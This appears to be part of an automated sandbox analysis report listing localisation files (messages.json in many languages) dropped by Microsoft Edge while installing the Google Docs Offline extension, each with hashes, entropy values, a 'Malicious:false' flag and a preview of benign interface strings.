                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2673
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7623737593212434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:Y3XjcMhavdrbYTESRvqCR9YEhB1bitNwttdajAldAtan19iZVuveVtj6zIkJrFvN:YIuwmpX3Z
                                                                                                                                                                                                                                                                          MD5:C825621044E4D5C504404DAE9752285C
                                                                                                                                                                                                                                                                          SHA1:68C1E29DAF042487CB76629ABCDC03F16FCCC92A
                                                                                                                                                                                                                                                                          SHA-256:47652115CBB912907F405992FCFC64F987642158F0CB35C9D6E0D4742D833802
                                                                                                                                                                                                                                                                          SHA-512:4AEF3E7A747E290BE8BA10E22E670C1C2DC653D4311020A4FD3060205FD88BB5D13D9EDF388FC18919ABE353C62D6841A4EF87E38064430299E52CA16C81941E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0625\u0646\u0634\u0627\u0621 \u062c\u062f\u064a\u062f"},"explanationofflinedisabled":{"message":"\u0623\u0646\u062a \u0628\u0644\u0627 \u0627\u062a\u0635\u0627\u0644\u060c \u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u0633\u062a\u0646\u062f\u0627\u062a Google \u0628\u0644\u0627 \u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a\u060c \u0627\u0646\u062a\u0642\u0644 \u0625\u0644\u0649 \u0627\u0644\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0641\u064a \u0627\u0644\u0635\u0641\u062d\u0629 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0644\u0645\u0633\u062a\u0646\u062f\u0627\u062a Google \u0648\u0634\u063a\u0651\u0644 \u0627\u0644\u0645\u0632\u0627\u0645\u0646\u0629 \u0628\u0644\u0627 \u0627\u062a\u0635\u0627\u0644 \u0641\u064a \u0627\u0644\u0645\u0631\u0629 \u0627\u0644\u0642\u0627\u062f\u0645\u0629 \u0627\u0644\u062a\u064a \u062a\u062a\u0635\u0644 \u0641\u064a\u0647\u0627 \u0628\u0627\u0644\u0625\u0646\u062a\u0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1134
                                                                                                                                                                                                                                                                          Entropy (8bit):4.946697942298551
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YjF5pt3w68IShJyEp36tE3sx8KdEELlUFPA4HWlsLVtM:YjXp5Szpt6q3leZEBp4
                                                                                                                                                                                                                                                                          MD5:C603747B8578C1324DD262565F643E06
                                                                                                                                                                                                                                                                          SHA1:5CD18BB971AF007D9A589377A662688DAAFE7519
                                                                                                                                                                                                                                                                          SHA-256:614470DA3C5034ACE649F1786BEAAAD2C94F4475BCC8858390B721F06FB7BF64
                                                                                                                                                                                                                                                                          SHA-512:59A5B29459E6A10628AB95ED620AB159DACDE2D98DC2C3DC7949D0E5E253F2BE7A21CB13F0EE8AE0E2F85191A520C9DAF797FD93B27C39F53B1FAA8AEF1B706A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"YEN\u0130S\u0130N\u0130 YARADIN"},"explanationofflinedisabled":{"message":"Oflayns\u0131n\u0131z. Google S\u0259n\u0259di internet ba\u011flant\u0131s\u0131 olmadan istifad\u0259 etm\u0259k ist\u0259yirsinizs\u0259, Google S\u0259n\u0259din \u0259sas s\u0259hif\u0259sind\u0259 ayarlara gedin v\u0259 n\u00f6vb\u0259ti d\u0259f\u0259 internet\u0259 qo\u015fulanda oflayn sinxronizasiyan\u0131 aktiv edin."},"explanationofflineenabled":{"message":"Oflayns\u0131n\u0131z, amma m\u00f6vcud fayllar\u0131 redakt\u0259 ed\u0259 v\u0259 yenil\u0259rini yarada bil\u0259rsiniz."},"extdesc":{"message":"S\u0259n\u0259d, c\u0259dv\u0259l v\u0259 t\u0259qdimatlar\u0131n ham\u0131s\u0131n\u0131 internet olmadan redakt\u0259 edin, yarad\u0131n v\u0259 bax\u0131n."},"extname":{"message":"Google S\u0259n\u0259d Oflayn"},"learnmore":{"message":"\u018ftrafl\u0131 M\u0259lumat"},"popuphelptext":{"message":"Harda olma\u011f\u0131n\u0131zdan v\u0259 internet\u0259 qo\u015fulu olub-olmad\

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                          Entropy (8bit):4.737169815587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGq1xWusXuqgA2fTq9LfXUJawSxrbBODgdU44pMiiwseeJ//yJgvskSF7L+mZn:Yx/s+B2LfkxSPdh1ih5W//DvskJc
                                                                                                                                                                                                                                                                          MD5:FBB841A2982166239D68907361F41F61
                                                                                                                                                                                                                                                                          SHA1:4A8D76A6FE1BB111FDBDFD42D1AF0019A97FC540
                                                                                                                                                                                                                                                                          SHA-256:DE6D7B7C2427EC4E738407D7834B71941F69166B030355E00F325FF1391DF5A1
                                                                                                                                                                                                                                                                          SHA-512:8DB540B4C9E250D3781797238B1D16AD820C568EDC563BFB912872AB99950DEF7E89EE432C696BA9876E3D7B24A4E4C26FA5B0FA9E76A54E11AE63996E02A561
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREA'N UN DE NOU"},"explanationofflinedisabled":{"message":"No tens connexi\u00f3. Per utilitzar Documents de Google sense connexi\u00f3 a Internet, ves a la configuraci\u00f3 de la p\u00e0gina d'inici d'aquest servei i activa l'opci\u00f3 per sincronitzar-se sense connexi\u00f3 la propera vegada que estiguis connectat a la xarxa."},"explanationofflineenabled":{"message":"Tot i que no tens connexi\u00f3, pots editar o crear fitxers."},"extdesc":{"message":"Edita, crea i consulta documents, fulls de c\u00e0lcul i presentacions, tot sense acc\u00e9s a Internet."},"extname":{"message":"Documents de Google sense connexi\u00f3"},"learnmore":{"message":"M\u00e9s informaci\u00f3"},"popuphelptext":{"message":"Escriu text, edita fitxers i col\u00b7labora-hi siguis on siguis, amb o sense connexi\u00f3 a Internet."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):953
                                                                                                                                                                                                                                                                          Entropy (8bit):4.879531339602706
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGsjxSGobXPj+dW2eqOTvo6NxFQcgdpXmSLZxZkwyXLmijk/RsYMVP4MVHRn:YtjgGoPwEPTlNnsdBmuTZpzJ2YFMnn
                                                                                                                                                                                                                                                                          MD5:48663A88DCF0EF6C9FADE9BEE4935B91
                                                                                                                                                                                                                                                                          SHA1:AF7CAD1498BB4B0F05C1468ABE3563D0182A97B4
                                                                                                                                                                                                                                                                          SHA-256:5A701D67910BA6C7CCEDC26E02FA707CC86A1BE57CD7D36290A3D268732A42C7
                                                                                                                                                                                                                                                                          SHA-512:3C3E5B9E56535EFE1E20D6024B6FA46D3EA969C971D5EC8F5AF1C933C1FEB75D25E7F26C9E2BB8D200BCA70EA1F1BD7E93E4E1C09DBC447340CDBEEFA91CC33F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"VYTVO\u0158IT"},"explanationofflinedisabled":{"message":"Jste offline. Pokud chcete Dokumenty Google pou\u017e\u00edvat bez p\u0159ipojen\u00ed k\u00a0internetu, a\u017e budete p\u0159\u00ed\u0161t\u011b online, p\u0159ejd\u011bte do nastaven\u00ed na domovsk\u00e9 str\u00e1nce Dokument\u016f Google a\u00a0zapn\u011bte offline synchronizaci."},"explanationofflineenabled":{"message":"Jste offline, ale st\u00e1le m\u016f\u017eete upravovat dostupn\u00e9 soubory nebo vytv\u00e1\u0159et nov\u00e9."},"extdesc":{"message":"Upravujte, vytv\u00e1\u0159ejte a\u00a0zobrazujte sv\u00e9 dokumenty, tabulky a\u00a0prezentace \u2013 v\u0161e bez p\u0159\u00edstupu k\u00a0internetu."},"extname":{"message":"Dokumenty Google offline"},"learnmore":{"message":"Dal\u0161\u00ed informace"},"popuphelptext":{"message":"Pi\u0161te, upravujte a\u00a0spolupracujte kdekoli, s\u00a0p\u0159ipojen\u00edm k\u00a0internetu i\u00a0bez n\u011bj."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):764
                                                                                                                                                                                                                                                                          Entropy (8bit):4.651259056196555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGxxeKzFkQdxaUZL6f1DOzelaOx7KhqgBJrN0x1gdeXW95AXWMwuRuxXzDyqZyFT:YI5FkQdUUIf1ypOeqgBYGdeXW9fWRuxc
                                                                                                                                                                                                                                                                          MD5:0E451C9C8453577E513AABF630C275F2
                                                                                                                                                                                                                                                                          SHA1:5912CC58AA82BC75691540C8AEACA7C68641539E
                                                                                                                                                                                                                                                                          SHA-256:94CDDB998C2C5AB40B6F074C359A60E6EEBAAA2D52A9649C22F4EA4C1B9936F2
                                                                                                                                                                                                                                                                          SHA-512:A89DCC1EC8C79E7CF702692E20EBC952907B2FB1D76A3BEEF60D7415BAEE24E055E2988B55E12CE00BC112C115DDD9D46D63BF0A1C511FFFB041DA7054391F80
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"OPRET NYT"},"explanationofflinedisabled":{"message":"Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g\u00e5 til indstillinger p\u00e5 startsiden for Google Docs og aktivere offlinesynkronisering, n\u00e6ste gang du har internetforbindelse."},"explanationofflineenabled":{"message":"Du er offline, men du kan stadig redigere tilg\u00e6ngelige filer eller oprette nye."},"extdesc":{"message":"Rediger, opret og se dine dokumenter, regneark og pr\u00e6sentationer helt uden internetadgang."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"F\u00e5 flere oplysninger"},"popuphelptext":{"message":"Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3726
                                                                                                                                                                                                                                                                          Entropy (8bit):3.6864881891406736
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y5prjrLX68uln3IIjrIJVkEvwjrjnIv/kPICH1LkIyo7NyjI8+8qjrlQ9IcXrhyu:urMFBYJiywTI3CH1L9NyMbuOcXrhN
                                                                                                                                                                                                                                                                          MD5:32886978EF4B5231F921EB54E683EB10
                                                                                                                                                                                                                                                                          SHA1:9E2626E158CBD26A2A24A50E4E8CFD98A49984E9
                                                                                                                                                                                                                                                                          SHA-256:728D8CBD71263680A4E41399DB65B3F2B8175D50CA630AFD30643CED9FFE831F
                                                                                                                                                                                                                                                                          SHA-512:416832F007470BF4D9D915410B62BD8159029D5DDABED23D2BBC297E4BBAE46F4346FEB68C54163428A6932C537967AE9EF430B9FAC111F15CFB001A480799B3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0394\u0397\u039c\u0399\u039f\u03a5\u03a1\u0393\u0399\u0391 \u039d\u0395\u039f\u03a5"},"explanationofflinedisabled":{"message":"\u0395\u03af\u03c3\u03c4\u03b5 \u03b5\u03ba\u03c4\u03cc\u03c2 \u03c3\u03cd\u03bd\u03b4\u03b5\u03c3\u03b7\u03c2. \u0393\u03b9\u03b1 \u03bd\u03b1 \u03c7\u03c1\u03b7\u03c3\u03b9\u03bc\u03bf\u03c0\u03bf\u03b9\u03ae\u03c3\u03b5\u03c4\u03b5 \u03c4\u03b1 \u0388\u03b3\u03b3\u03c1\u03b1\u03c6\u03b1 Google \u03c7\u03c9\u03c1\u03af\u03c2 \u03c3\u03cd\u03bd\u03b4\u03b5\u03c3\u03b7 \u03c3\u03c4\u03bf \u03b4\u03b9\u03b1\u03b4\u03af\u03ba\u03c4\u03c5\u03bf, \u03bc\u03b5\u03c4\u03b1\u03b2\u03b5\u03af\u03c4\u03b5 \u03c3\u03c4\u03b9\u03c2 \u03c1\u03c5\u03b8\u03bc\u03af\u03c3\u03b5\u03b9\u03c2 \u03c3\u03c4\u03b7\u03bd \u03b1\u03c1\u03c7\u03b9\u03ba\u03ae \u03c3\u03b5\u03bb\u03af\u03b4\u03b1 \u03c4\u03c9\u03bd \u0395\u03b3\u03b3\u03c1\u03ac\u03c6\u03c9\u03bd Google \u03ba\u03b1\u03b9 \u03b5\u03bd\u03b5\u03c1\u03b3\u03bf\u03c0\u03bf\u03b9\u03ae\u03c3\u03c

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711
                                                                                                                                                                                                                                                                          Entropy (8bit):4.623529061631689
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGGfBxEN3Pj1NzXW6iFrVxYJGceWgd/NnKAfArMwuRqtxdATxiPB:YfJK/BNzXviFrVa4dd/N94rWRaAaB
                                                                                                                                                                                                                                                                          MD5:558659936250E03CC14B60EBF648AA09
                                                                                                                                                                                                                                                                          SHA1:32F1CE0361BBFDFF11E2FFD53D3AE88A8B81A825
                                                                                                                                                                                                                                                                          SHA-256:2445CAD863BE47BB1C15B57A4960B7B0D01864E63CDFDE6395F3B2689DC1444B
                                                                                                                                                                                                                                                                          SHA-512:1632F5A3CD71887774BF3CB8A4D8B787EA6278271657B0F1D113DBE1A7FD42C4DAA717CC449F157CE8972037572B882DC946A7DC2C0E549D71982DCDEE89F727
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREATE NEW"},"explanationofflinedisabled":{"message":"You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet."},"explanationofflineenabled":{"message":"You're offline, but you can still edit available files or create new ones."},"extdesc":{"message":"Edit, create, and view your documents, spreadsheets, and presentations \u2014 all without internet access."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"Learn More"},"popuphelptext":{"message":"Write, edit, and collaborate wherever you are, with or without an internet connection."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711
                                                                                                                                                                                                                                                                          Entropy (8bit):4.623529061631689
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGGfBxEN3Pj1NzXW6iFrVxYJGceWgd/NnKAfArMwuRqtxdATxiPB:YfJK/BNzXviFrVa4dd/N94rWRaAaB
                                                                                                                                                                                                                                                                          MD5:558659936250E03CC14B60EBF648AA09
                                                                                                                                                                                                                                                                          SHA1:32F1CE0361BBFDFF11E2FFD53D3AE88A8B81A825
                                                                                                                                                                                                                                                                          SHA-256:2445CAD863BE47BB1C15B57A4960B7B0D01864E63CDFDE6395F3B2689DC1444B
                                                                                                                                                                                                                                                                          SHA-512:1632F5A3CD71887774BF3CB8A4D8B787EA6278271657B0F1D113DBE1A7FD42C4DAA717CC449F157CE8972037572B882DC946A7DC2C0E549D71982DCDEE89F727
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREATE NEW"},"explanationofflinedisabled":{"message":"You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet."},"explanationofflineenabled":{"message":"You're offline, but you can still edit available files or create new ones."},"extdesc":{"message":"Edit, create, and view your documents, spreadsheets, and presentations \u2014 all without internet access."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"Learn More"},"popuphelptext":{"message":"Write, edit, and collaborate wherever you are, with or without an internet connection."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1353
                                                                                                                                                                                                                                                                          Entropy (8bit):4.46957273133348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:ifG+18NQpTmavDFJKrbAUsDAa9xaCBiiK5ybsCrs4VKHszb/BNzXviFrTKnC:IGKpTmOFJKrbJaVTRBNK5ybsCtVKHs3m
                                                                                                                                                                                                                                                                          MD5:64EAEB92CB15BF128429C2354EF22977
                                                                                                                                                                                                                                                                          SHA1:45EC549ACAA1FDA7C664D3906835CED6295EE752
                                                                                                                                                                                                                                                                          SHA-256:4F70ECA8E28541855A11EC7A4E6B3BC6DD16C672FF9B596ECFB7715BB3B5898C
                                                                                                                                                                                                                                                                          SHA-512:F63EE02159812146EEE84C4EB2034EDFC2858A287119CC34A8B38C309C1B98953E14CA1CA6304D6B32B715754B15BA1B3AA4B46976631B5944D50581B2F49DEF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{. "extName": {. "message": "Google Docs Offline",. "description": "Extension name". },. "extDesc": {. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",. "description": "Extension description". },. "createNew": {. "message": "CREATE NEW",. "description": "Text shown in the extension pop up for creating a new document". },. "popupHelpText": {. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.",. "description": "Help text that is shown as part of the extension pop-up title". },. "learnMore": {. "message": "Learn More",. "description": "Text shown after the help text that the user can click to learn more.". },. "explanationOfflineEnabled": {. "message": "You're offline, but you can still edit available files or create new ones.",. "description": "Text shown in the extension popup when the user is offline and offline is enabled.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                          Entropy (8bit):4.707262377134109
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YyEe4falFHa/lFyVrW8SMd2S0unui9Wm5:YyEe4fCY/lForlSo2Sd9n5
                                                                                                                                                                                                                                                                          MD5:59CB3A9999DFBD19C3E3098F3B067634
                                                                                                                                                                                                                                                                          SHA1:BCFDF1C9C7F5D0CE35D7918060CE704A99803BF4
                                                                                                                                                                                                                                                                          SHA-256:02168993A23E074E0800CBB338FE279F99EF420E326BF92916FFED83C1F06533
                                                                                                                                                                                                                                                                          SHA-512:9968ACB9821BFFF6F427AABFCDE3023F5A6F588BBFC0EFD2275F201930EC5E16D64FF228C76F77958D36091A3DBD510E95385F0CB99A3E4DDE693F34E9E3EBF5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREAR"},"explanationofflinedisabled":{"message":"No tienes conexi\u00f3n. Para usar Documentos de Google sin conexi\u00f3n a Internet, ve a Configuraci\u00f3n en la p\u00e1gina principal de Documentos de Google y activa la sincronizaci\u00f3n sin conexi\u00f3n la pr\u00f3xima vez que te conectes a Internet."},"explanationofflineenabled":{"message":"No tienes conexi\u00f3n. Aun as\u00ed, puedes crear archivos o editar los que est\u00e9n disponibles."},"extdesc":{"message":"Edita, crea y consulta tus documentos, hojas de c\u00e1lculo y presentaciones; todo ello, sin acceso a Internet."},"extname":{"message":"Documentos de Google sin conexi\u00f3n"},"learnmore":{"message":"M\u00e1s informaci\u00f3n"},"popuphelptext":{"message":"Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi\u00f3n a Internet."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                          Entropy (8bit):4.7690437626114095
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YBsBU2zy0VEhHIFa0EdDfdJLbl+gNHq2m/:YBsBUMy0VgIF0rdJAgpq2U
                                                                                                                                                                                                                                                                          MD5:B18007BFC2B55D2F5839A8912110B98D
                                                                                                                                                                                                                                                                          SHA1:842ECAC418424B2FFF4DB81E4385D59E098B65DE
                                                                                                                                                                                                                                                                          SHA-256:7CCC7B17BFE01C3C7DD33EFF8F80D0B57FC9B175815E766C9C1C1E893725E20F
                                                                                                                                                                                                                                                                          SHA-512:166937891553597D585D17FDA2E7FF2BFFBD3731841EA6CDCB7ADD528A55AA7C257FC191D029DD1F57AFD4349194C0CC7413C3752641E8217D465674B62B8AE0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"LOO UUS"},"explanationofflinedisabled":{"message":"Teil ei ole v\u00f5rgu\u00fchendust. Teenuse Google\u2019i dokumendid kasutamiseks ilma Interneti-\u00fchenduseta avage j\u00e4rgmine kord, kui olete Internetiga \u00fchendatud, teenuse Google\u2019i dokumendid avalehel seaded ja l\u00fclitage sisse v\u00f5rgu\u00fchenduseta s\u00fcnkroonimine."},"explanationofflineenabled":{"message":"Teil ei ole v\u00f5rgu\u00fchendust, kuid saate endiselt saadaolevaid faile muuta v\u00f5i uusi luua."},"extdesc":{"message":"Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-\u00fchenduseta."},"extname":{"message":"V\u00f5rgu\u00fchenduseta Google\u2019i dokumendid"},"learnmore":{"message":"Lisateave"},"popuphelptext":{"message":"Kirjutage, muutke ja tehke koost\u00f6\u00f6d \u00fcksk\u00f5ik kus olenemata sellest, kas teil on Interneti-\u00fchendus."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                          Entropy (8bit):4.752980827747988
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGA4cxpMnfBqitA7gPQFsvYOxwMcXwes6f6gdEfNqgb0WMwun3q7VI2RXM0C:YJCpq4AsPbYOgXwesIrdEFqs0WWIRc0C
                                                                                                                                                                                                                                                                          MD5:1D4778E02337674D7D0664B5E7DFCBBE
                                                                                                                                                                                                                                                                          SHA1:FE1763AC0A903A47446A5896A2D12CCE5D343522
                                                                                                                                                                                                                                                                          SHA-256:A822B0E66D04644D1CFBD2517736728438743162C3213F15D986E2DB85BD0213
                                                                                                                                                                                                                                                                          SHA-512:771C7BA7F93A6E9DB94593897D495E190E58A9B9C490523CC410059E72538005E2DE96864DBBED8BD1F01EAA4D1CD022443DDDBF759A606E2903C9DDECAC43FE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"LUO UUSI"},"explanationofflinedisabled":{"message":"Olet offline-tilassa. Jos haluat k\u00e4ytt\u00e4\u00e4 Google Docsia ilman internetyhteytt\u00e4, siirry Google Docsin etusivulle ja ota asetuksissa k\u00e4ytt\u00f6\u00f6n offline-synkronointi, kun seuraavan kerran olet yhteydess\u00e4 internetiin."},"explanationofflineenabled":{"message":"Olet offline-tilassa. Voit kuitenkin muokata k\u00e4ytett\u00e4viss\u00e4 olevia tiedostoja tai luoda uusia."},"extdesc":{"message":"Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi\u00e4 ilman internetyhteytt\u00e4."},"extname":{"message":"Google Docsin offline-tila"},"learnmore":{"message":"Lis\u00e4tietoja"},"popuphelptext":{"message":"Kirjoita, muokkaa ja tee yhteisty\u00f6t\u00e4 paikasta riippumatta, my\u00f6s ilman internetyhteytt\u00e4."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):799
                                                                                                                                                                                                                                                                          Entropy (8bit):4.5651810777615305
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:Y7nKH2eZXn6sjLg8dRSud9pQ/gWRWRWuix9:Y7nKHfZqsHg8/x4Lki9
                                                                                                                                                                                                                                                                          MD5:F954B2E970DC96E5889499DB7392FD59
                                                                                                                                                                                                                                                                          SHA1:39F56F0EBFE92C96E8BF91F82CC4FDDBED1E0AAF
                                                                                                                                                                                                                                                                          SHA-256:41CE6A7B18364EFECCED0419B42165D4F86C43643BBE1043014D4142CF86186A
                                                                                                                                                                                                                                                                          SHA-512:23610477834FF51E93FE9467DF997F9AEEE63CE3A8A51464B87B1828DCE25D50E0BF2F28DF139EC59E6C6425B81613258DE211735AB2E470DC63C9CB5A1860E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"GUMAWA NG BAGO"},"explanationofflinedisabled":{"message":"Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet."},"explanationofflineenabled":{"message":"Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago."},"extdesc":{"message":"I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation \u2014 lahat ng ito nang walang access sa internet."},"extname":{"message":"Google Docs Offline"},"learnmore":{"message":"Matuto Pa"},"popuphelptext":{"message":"Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
